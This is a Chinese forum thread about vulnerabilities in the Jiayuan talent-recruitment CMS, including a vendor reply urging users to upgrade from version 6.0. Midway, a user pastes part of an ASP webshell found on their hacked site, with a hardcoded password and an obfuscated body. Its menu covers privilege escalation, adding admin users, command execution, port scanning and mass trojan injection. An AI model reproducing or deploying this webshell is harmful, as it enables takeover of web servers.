不看不知道!一看吓一跳!
http://www.baidu.com/s?wd=%C8%CB%B2%C5%CF%B5%CD%B3%20%C2%A9%B6%B4&pn=10&tn=shnetzone_pg百度搜索人才系统 漏洞我们的嘉缘竟然到处都是,嘉缘到底得罪谁了全天下都找嘉缘麻烦
在这样建议大家放弃嘉缘了
http://blog.163.com/yxmhero1989/blog/static/11215795620098275412207/ 提到漏洞,现今知名一点的CMS系统,哪个没有漏洞,都是天天报漏洞,天天发补丁。那些不知名的程序,黑客都看不上,因为攻击也没什么意思,用户站点不多,没有什么可利用价值。楼主觉得微软厉害不?操作系统从发布第一个版本开始,连续升级,连续修补漏洞,这又说明什么呢?
百度搜索人才系统漏洞,出来的全是嘉缘,说明嘉缘的影响力还是不错,至少发布漏洞的网站的站长认为这个有价值。搜索通用词搜不出来的系统,你试着输入类似“嘉缘人才系统 漏洞”,再看看结果,是不是都有所谓的漏洞呢。嘉缘并没有得罪谁,不存在别人刻意找嘉缘的麻烦,嘉缘是这么认为的。
嘉缘通过不断提升团队自身的技术水平,不断为用户提供更为安全的软件产品,用户数量不断增加,难免会有一些公司或者个人利用不正当竞争手段攻击嘉缘,这个我相信是存在的。我们相信事实说明一切,漏洞不可怕,可怕的是发现不了漏洞。
楼主的建议不免会被别人误以为我们得罪了楼主,在这里说明以下,我们相互之间谁都没得罪谁!
最后楼主提到的这个博文,我们再该文章刚发布的时候就有看到,此文章为V6.02版发布之后,某黑客站点所发,这里提醒一下各位用户朋友,V6.02不存在文章所提到的漏洞问题,因为该黑客攻击的是V6.0的站点,V6.0确实存在文章提到的漏洞,如果有还再使用V6.0的用户请尽快升级,以免造成不必要的损失。 我支持嘉缘 你说的太厉害了,我错了我 我的站被搞个这个
UserPass=\"7758258\"
mName=\"超级免杀ASP\"
SiteURL=\"http://www.baidu.com\"
Copyright=\"\"
AD=\"盈,你还好吗?\"
Z6S}Il~[!!6^01i?;]6SdAzIRK]);|RZ}Jr\")~:Z!!TTZijZ\"6dS$zI fb\"|UubGr O;rJ6\")PR~bj2 /rdr]l,a!TTZ!T8r@#@&I]UJm mKVK.)?rRChPmW^GD=a%R0I0KxDOdk\"n=FqwXI8r@#@&]\"?J@!&kYzV@*r@#@&\"IUJ@!kmMrwDPsl o;CT+\'NC\\m/mMr2Y@*0!x^YrG PVk^s2MDG.k`#`.Y;D ~DD;i)hk NKARKxnDMW.x0kV^3DMWDkIE@#@&I\"?E0;U1YrW ~X/GVv# rW,`^W WbDhvJr确认要执行此操作吗?JJ*#MnY!P:bAd3~$:l(Vn1ChT~f\"6n,Z6J`H1~Kz?jJrIUY.]FyT\',Jr当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现 - 超过一条数据只显示字段的前五十个字节。JEib0cr@!\'&*`f(sWMh f(?DD \\Cs!+~\',jYM$rDpf4oGM: ?$sUY.c\\mVEP{~JrJEim4^ bxx.C:HS{EE@!1+ YnD@*请确认己连接数据库再输入j5S操作命令语句。@!z1nxD+.@*rJiNn^/nPbWvkx{Fy# mV.Yv?OD]kDbp8+^d+Pf4wG.:c?$VjY. 7lsE~\',?O.]kTINM+OEMU,Y.!+p8J@#@&\"]?r0;x1YrG Ps!sVU;VUO.`kYM~2ob`b0cf(oWM: 9(?Y. 7lsE ^+UTY4@!** ms+MYcJr请检查数据库连接串是否正确\"EE*iDOEMxP6Cs/i)kW`dOMRs+ LY4@!qT* lsnMYcJr请检查j5S语句是否正确ZrJ*iDY!.x,0CVk+ING4sK.:c?;^jODc\\mV;+~x,/ODp94wW.hcnlLnc\\CV!n,\'~aopl41RbUxDuKtSxErJJp94wWDs dE(:bYc#I.Y;D ~YMEnI)J@#@&]\"?E@!Jd1DraY@*J@#@&DMdPr@!8W9XE~@#@&q6~b1YkKUxJrPDtnx~]\"?~J,dmMWss{xWE@#@&D./,E@*J@#@&fb}4:cF2~+#=r8Pv!~ZbP{PJU^.kaYbxLRor^+jXkO+sr8%mYEl}4P`ZSy#~{Pr文件操作组件J)}4:cFB!bP{PEAkmDb2Yc/tssJ=r(KcFS+*PxPr命令行执行组件E)}4Pcy~!b~{PEbG6oR/mYmVWTJ=64:`+~y#~x,Jb;/2U?建库组件J=68Kv&B!bPx~r9]rcB+D2ULbx+El}4P`2Sy#~{PrbZ;2Uj压缩组件J=r8KvcST*P\',E?1DkaOrxTRGk^YrG l.Xr~)}4PcW~ b~{PE数据流上传辅助组件J=6(Kcl~Z#P{Pr)NKN8R1WUUmYbGxr)r(Pc*B *PxPE数据库连接组件E=r8Kv~Z#~x,JbwHmk^发信组件E)}4P`8&ST*P\',EHbmDKdG0DRoHJCPPhJlr(P`8&S+*P\'~E数据传输组件r@#@&sK.,kxZP:WP8&@#@&dU+OP:\'jnM\\+M ZM+lDn64N+1Ycr8PvkS!*b@#@&d(W,O q*F DN@*@!Y9@*J@#@&\"]?r@!rxaEO~ l:xBwWV9n.nmY4B~/Oz^+xBSrNDtlqZ!]v~7lsExEJ\'U+k/kKxvEsKV[+MnCO4J#LEB@*J@#@&]]?r@!JY[@*@!O9PAk9Ot{Bq*ZBPCsboU\'E^xODE@*@!bxa;Y,xC:\'vj!4:bOB,YXanxBkE(:rYv~7lsExB转到E@*~@!bxw;O,YzwxE/;(:bYB,\\msE\'v刷新B,WU^^km0xBwkVo.ls+cVGmCObWURMnVKl\"?E@!D.@*提权目录列表:『@!C,tM+0\'EJ*B@*b^VidD/@!&l@*』『@!l,4.+6\'ELC\\Cd1DrwDl?4WAoKVNn.vJEZ=w\'fG1Es+xD/,Cx9Pj+DYrUT/-\')V^Pjkn./\'-「开始」菜单\'-程序w-EE*B@*程序@!~?5S,?nD-nM-wJrbB@*?}J@!zl@*』『@!mP4DW{B%m\\m/mMkaO)UtGhwWs[D`rEZ=--q(HfE@!YM@*@!DN,4+bo4Y{B+*E@*无权限z无wjr@!zY9@*@!zDD@*J@#@&3sk+@#@&\"]?r@!O.@*@!Y[~4+ro4O{ +,W :W!/G\\DxJr:nU!FRkOX^+R9rdw^lH\'vBEE@*@!8@*r\'0mmncr000TZ!E~rQ8JSrCr#UPzAZc?4GhGDr\\Dcb=?+D~b~Z\'gGOtbxT@#@&I]jr@!&Nb-@*@!zO[@*@!zO.@*@!OD@*@!DN~4+botD\'E+!E@*@!l,t.n6\'BNC\\m/mMr2Y=?4WAsGs9+.`rEJLInKmYtc q]WKO*]UJ@!YM@*@!Y[,tko4Y{v ZB@*@!mP4.0\'E%l7l/1.rwD)UtGhoG^NnDvEJr[]nhlY4c\"WGYhCDtbLJrJ#E@*@!8@*rnhlY4cU+d/bG `EwW^N+MnmOtr#\'J\'1nAwWV9nDr#]UJ@!D.@*@!YN,4nkTtD\'v Tv@*@!CP4.+6\'v_zmYrG {Jb\'r查看可写目录@!zC@*@!4.@*r@#@&I]UJ@!YD@*@!D?r@!DD@*@!Y9PtkT4Y{B+!E@*@!C,tDW\'Egb1OrW \'T+OKn.skUl%TTZJ~ZSJ{J#LE终端端口R自动登录@!JlLJ服务信息O组件支持@!zm@*@!(D@*J@#@&]]UJ@!D.@*@!YN,4nkTtD\'v Tv@*@!CP4.+6\'v_zmYrG %Z!ZJS!SE{Jb[r系统服务R用户账号{B+!E@*@!C,tDW\'Egb1OrW \'mNhkUC(B~Ym.oYxvwkVnoMlh+E@*r[Wmm`J60RT!ZJS!BJxE*[J系统用户 查管理员@!zm0xvQbmDrW \'l9!BE\'r#\'J〖增加用户〗@!zC@*@!4D@*E{v ZB@*@!mPt.n6\'vgz^DkG +cJWWR!T!rS!BJxE*[J〖j}d提权@*@!C~tM+6\'vg)^DkGx~!BE\'r#[r〖j}S Ztf〗@!zC@*@!@*@!m~tM+W\'Eg)^DkW %ZTZJSZ~r\'J*[r〖漏洞检测〗@!!v@*@!CP4DnW{Bg)^DkGxBJxE*[J〖/\\G命令 !r~!BExJ*[r〖?;O用户通杀版〗@!&@*@!l,t.+6\'v_zmYbGx!~r\'rb[r〖?;OwKK通杀版〗@!Jl.T+Y{vsbV+w.C:B@*J\'0C^`E060!Z!ESZ~JxE*[E〖端口扫描〗@!JC@*@!8M@*r@#@&\"IUE@!!!ZTJB!~rxE#LJ〖直接下载〗@!zC@*@!.+6\'vgzmOrKx\'~Z~J{J*\'J〖注册表操作〗@!zC@*@!zmOkKU{*\'J〖hCK探针〗@!Jl@*@!~tM+0{v_b1YbWU\'KCT+)!JBT~r\'J*\'E〖整站打包〗@!Jl@*@!&Y[@*@!@*r@#@&\"I?r@!E@*@!J8@*JL0mmn`EW6%T!ZE~Z~Exr#[E批量挂马c快速版*@ 给我放在根目录下,我都不知道是怎末给我上传上去的 上传木马的途径很多,站点漏洞上传 跨站上传等等,方式很多,原因也很多.具体问题要具体分析,不能一概全部归到系统上. 用户放照片的那个文件夹也有,就是查不出木马,还有两条黄色的友情连接代码是写在首页文件index.asp和版权里面 有的用户,买了空间,然后自己写个程序放上去,结果中马了,然后他找空间商说,空间怎么回事,是不是有漏洞啊,我自己写的程序怎么还挂马.空间商说网站程序有问题,用户就是不承认,埋怨空间不好!
我们再做虚拟主机的过程中也遇到很多这样的情况,所以具体问题要具体分析解决,不能一概推给服务商,否则最终受损失的还是用户自己!
页:
[1]
2